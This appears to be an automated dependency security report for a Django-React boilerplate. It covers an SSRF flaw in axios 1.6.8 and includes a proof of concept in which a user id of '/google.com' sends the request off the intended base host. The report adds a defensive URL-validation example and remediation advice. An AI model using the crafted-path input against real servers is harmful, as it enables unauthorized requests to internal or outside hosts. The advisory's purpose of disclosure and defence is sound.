Vulnerabilities: 1 via 1 paths
Dependencies: 129
Source: GitHub
Commit: 37cb4d29


high severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: axios@1.6.8

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate#37cb4d29a35886fe431d5797246534db912e0cc2 axios@1.6.8
    Remediation: Upgrade to axios@1.7.4.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) because a path-relative URL that begins with two slashes (such as //google.com) is processed as a protocol-relative URL: the configured baseURL is not applied and the request is sent to the host named in the path. An attacker who controls that path segment can therefore make the server issue unauthorized requests to a host of their choosing.

PoC


const axios = require('axios');

// Client pinned to the intended API host.
const client = axios.create({
  baseURL: 'https://userapi.example.com',
});

// A normal id would be '12345'. An id that starts with a slash produces a
// request path beginning with "//", which affected versions treat as a
// protocol-relative URL instead of a path under baseURL.
// const userId = '12345';
const userId = '/google.com';

client.get(`/${userId}`).then(function (response) {
  console.log(`config.baseURL:  ${response.config.baseURL}`);
  console.log(`config.method:   ${response.config.method}`);
  console.log(`config.url:      ${response.config.url}`);
  console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
}).catch(function (err) {
  console.error(`request failed: ${err.message}`);
});

Output:

config.baseURL:  https://userapi.example.com
config.method:   get
config.url:      //google.com
res.responseUrl: http://www.google.com/
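Added example, not code from the Snyk advisory or from axios: a defensive URL builder for the PoC's pattern that validates the user-supplied segment and then checks that the resolved URL is still on the intended origin. It uses Node's built-in WHATWG URL class to illustrate protocol-relative resolution (an assumption of this example; axios combines baseURL and path with its own code), and the base URL is the constructed sample from the PoC.

```javascript
// Constructed sample base, as in the PoC above.
const BASE_URL = 'https://userapi.example.com';

// Same shape of failure as the advisory: a path that begins with "//" is
// resolved as protocol-relative, so the host is replaced. This uses WHATWG
// URL resolution to show the behaviour; it is not axios's URL-combining code.
function resolveUnchecked(base, path) {
  return new URL(path, base).href;
}

// Allow-list for a single path segment: nothing that can alter the path
// structure or the authority. Adjust the pattern to the id format in use.
const SAFE_SEGMENT = /^[A-Za-z0-9_-]{1,64}$/;

// Hardened variant: validate the segment first, then (defence in depth)
// confirm the resolved URL is still on the intended origin before use.
function buildUserUrl(base, userId) {
  const id = String(userId);
  if (!SAFE_SEGMENT.test(id)) {
    throw new Error(`invalid user id segment: ${JSON.stringify(id)}`);
  }
  const url = new URL(`/${encodeURIComponent(id)}`, base);
  if (url.origin !== new URL(base).origin) {
    throw new Error(`request would leave ${base}: ${url.href}`);
  }
  return url.href;
}

// Stand-alone demonstration with the PoC's inputs.
console.log(resolveUnchecked(BASE_URL, `/${'/google.com'}`)); // https://google.com/
console.log(buildUserUrl(BASE_URL, '12345')); // https://userapi.example.com/12345
try {
  buildUserUrl(BASE_URL, '/google.com');
} catch (err) {
  console.log(`rejected: ${err.message}`);
}
```

The origin check also catches cases the allow-list was loosened to permit, such as an id containing a backslash or "@" that some resolvers treat specially.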

Remediation

Upgrade axios to version 1.7.4 or higher.
